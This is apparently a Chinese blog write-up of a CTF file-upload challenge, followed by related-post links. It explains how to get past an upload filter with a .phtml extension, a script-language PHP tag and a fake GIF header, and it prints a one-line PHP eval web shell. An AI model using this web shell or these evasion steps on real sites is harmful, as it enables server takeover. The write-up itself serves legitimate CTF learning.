[极客大挑战 2019]Upload 1

一进去看

不能在明显的文件上传了最多就是rao waf

随便上传个webshell.php

肯定要用到抓包了

抓到请求包

准备改

常规操作失效还有层waf

还有一层。。

它检测了文件内容 HTML解码得到 <?

这里可以改成 <script language="pHp">eval($_POST[\'hack\']);</script>

页面 html标记 php语言

一般这样就要将 php 改成 phtml了

又过了一层

最后需要改文件头了

改成图片文件头

让它匹配到这是一张 gif图

能够访问就是上传成功了

上传成功蚁剑连接根目录下放flag

相关文章：

猜你喜欢

BUUCTF——[极客大挑战 2019]Upload 1 2021-07-18
[极客大挑战 2019]Upload 2021-12-08
[极客大挑战 2019] web题-Upload 2021-10-17
[极客大挑战 2019]Upload 思路 2021-07-04
buuctf 极客大挑战 upload 2021-05-19
BUU_Web 极客大挑战 Upload 2021-11-06
[极客大挑战 2019]LoveSQL 1 2021-06-24

相关资源

30天(一个月)挑战C++ 精选教程 PDF下载 2022-12-31
用Jquery实现大文件上传 Jquery Large File Upload v10.31.0下载 2023-01-21
Jfinal极速开发实战中文PDF版 4.67MB下载 2022-12-07

相似解决方案

热门标签

Java Python linux javascript Mysql C# Docker 算法前端 SpringBoot Redis Vue spring 设计模式 .net core .net kubernetes c++ 数据库数据结构大数据 js 机器学习微服务 Android Go 程序员面试 JVM ASP.net core 云原生人工智能后端 PHP git CSS golang k8s Nginx Django mybatis 深度学习多线程 React 架构 devops 爬虫云计算 Spring Boot LeetCode